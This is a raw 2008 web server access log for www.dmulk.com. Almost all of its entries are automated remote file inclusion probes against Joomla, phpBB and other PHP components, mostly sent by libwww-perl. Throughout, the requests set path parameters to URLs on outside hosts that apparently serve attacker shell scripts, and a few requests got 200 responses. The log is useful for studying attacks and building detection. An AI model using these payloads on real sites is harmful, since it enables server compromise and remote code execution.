193.136.6.38 - - [24/May/2008:12:31:36 -0700] "GET /logs//initiate.php?abs_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
59.106.19.213 - - [24/May/2008:12:31:38 -0700] "GET /logs/access_080215.log//Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.blasterwb.com/publicidad/transervice_no/imagok/imagok/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:31:42 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:31:47 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.158.130 - - [24/May/2008:12:31:51 -0700] "GET /language/lang_english/lang_activity.php?phpbb_root_path=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.158.130 - - [24/May/2008:12:31:53 -0700] "GET /logs/access_071219.log/language/lang_english/lang_activity.php?phpbb_root_path=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.158.130 - - [24/May/2008:12:31:55 -0700] "GET /logs/language/lang_english/lang_activity.php?phpbb_root_path=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:12:32:05 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:12:32:05 -0700] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.249.155.6 - - [24/May/2008:12:32:32 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.146.59.228 - - [24/May/2008:12:32:37 -0700] "GET /logs/access_080401.log/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.8.135 - - [24/May/2008:12:32:48 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.8.135 - - [24/May/2008:12:32:49 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:12:32:49 -0700] "GET //initiate.php?abs_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:12:32:49 -0700] "GET /logs//initiate.php?abs_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:32:50 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:32:51 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:32:51 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:32:56 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:32:56 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:32:57 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.186.11.35 - - [24/May/2008:12:33:37 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.fr0xweb.altervista.org/inghilterra/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:33:40 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:33:40 -0700] "GET /convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:33:40 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.186.11.35 - - [24/May/2008:12:33:41 -0700] "GET /////?mosConfig_absolute_path=http://www.fr0xweb.altervista.org/inghilterra/text.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
91.186.11.35 - - [24/May/2008:12:33:44 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.fr0xweb.altervista.org/inghilterra/text.txt? HTTP/1.1" 200 48851 "-" "libwww-perl/5.811" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:33:47 -0700] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:33:47 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:33:47 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:34:15 -0700] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.146.59.228 - - [24/May/2008:12:34:21 -0700] "GET /logs/index.php?redir=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.59.228 - - [24/May/2008:12:34:28 -0700] "GET /index.php?redir=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:34:34 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:34:36 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:34:37 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:12:34:38 -0700] "GET /logs/access_080312.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:12:34:39 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:12:34:39 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.167.156.20 - - [24/May/2008:12:34:43 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=%20http://www.crazywap.co.uk/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:12:34:44 -0700] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:35:24 -0700] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:12:35:29 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:35:35 -0700] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:35:36 -0700] "GET /logs/access_080215.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:12:35:44 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:35:54 -0700] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.156.181 - - [24/May/2008:12:36:28 -0700] "GET /logs/access_080327.log//admin/classes/TplLoad.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.47.165.69 - - [24/May/2008:12:36:36 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.255.4.13 - - [24/May/2008:12:36:36 -0700] "GET /logs/access_080326.log////common/db.php?commonpath=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.47.165.69 - - [24/May/2008:12:36:36 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.255.4.13 - - [24/May/2008:12:36:37 -0700] "GET ////common/db.php?commonpath=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.4.13 - - [24/May/2008:12:36:37 -0700] "GET /logs////common/db.php?commonpath=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:12:37:01 -0700] "GET /logs/index.php?redir=http://www.duclaux.net/wiki/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:37:07 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:12:37:10 -0700] "GET /index.php?redir=http://www.duclaux.net/wiki/mic22.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
209.47.165.69 - - [24/May/2008:12:37:34 -0700] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.255.4.13 - - [24/May/2008:12:37:48 -0700] "GET /logs/access_080325.log////common/db.php?commonpath=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.47.165.69 - - [24/May/2008:12:37:48 -0700] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.255.4.13 - - [24/May/2008:12:38:00 -0700] "GET /logs/access_080327.log//core/pdf.php?config[pdf_module]=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:38:46 -0700] "GET /logs/access_080314.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:12:38:55 -0700] "GET /logs//main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:12:38:56 -0700] "GET /logs//main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:12:38:56 -0700] "GET //main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:12:38:56 -0700] "GET //main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:39:03 -0700] "GET /logs/access_080121.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:39:14 -0700] "GET /logs/access_080412.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:39:43 -0700] "GET /logs/access_080120.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:39:50 -0700] "GET /logs/access_080304.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:40:20 -0700] "GET /logs//index.php?sourcedir=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.19 - - [24/May/2008:12:40:26 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.19 - - [24/May/2008:12:40:26 -0700] "GET /minamijewelry/source_images/?S=D HTTP/1.1" 200 2414 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:40:27 -0700] "GET /logs/access_080222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:40:27 -0700] "GET //index.php?sourcedir=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:40:28 -0700] "GET /logs/access_080303.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:40:36 -0700] "GET /logs/access_080331.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:40:38 -0700] "GET /logs/access_071230.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.39.235 - - [24/May/2008:12:41:10 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp:/84.32.137.157/incoming/upload/trex/index.php?option=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.39.235 - - [24/May/2008:12:41:11 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp:/84.32.137.157/incoming/upload/trex/index.php?option=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.39.235 - - [24/May/2008:12:41:11 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp:/84.32.137.157/incoming/upload/trex/index.php?option=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:41:26 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:12:41:37 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:12:41:49 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:12:42:10 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://bethshemuel.com/cache/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:12:42:10 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://bethshemuel.com/cache/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:12:42:11 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://bethshemuel.com/cache/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:42:34 -0700] "GET /logs/access_071228.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:42:44 -0700] "GET /logs/access_080106.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:42:51 -0700] "GET /logs/access_080105.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.4.160 - - [24/May/2008:12:43:09 -0700] "GET /logs/access_080218.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.4.160 - - [24/May/2008:12:43:14 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.4.160 - - [24/May/2008:12:43:17 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:43:17 -0700] "GET /logs/access.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:12:44:24 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:12:44:24 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:44:32 -0700] "GET /logs/access.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:12:44:38 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:12:44:39 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
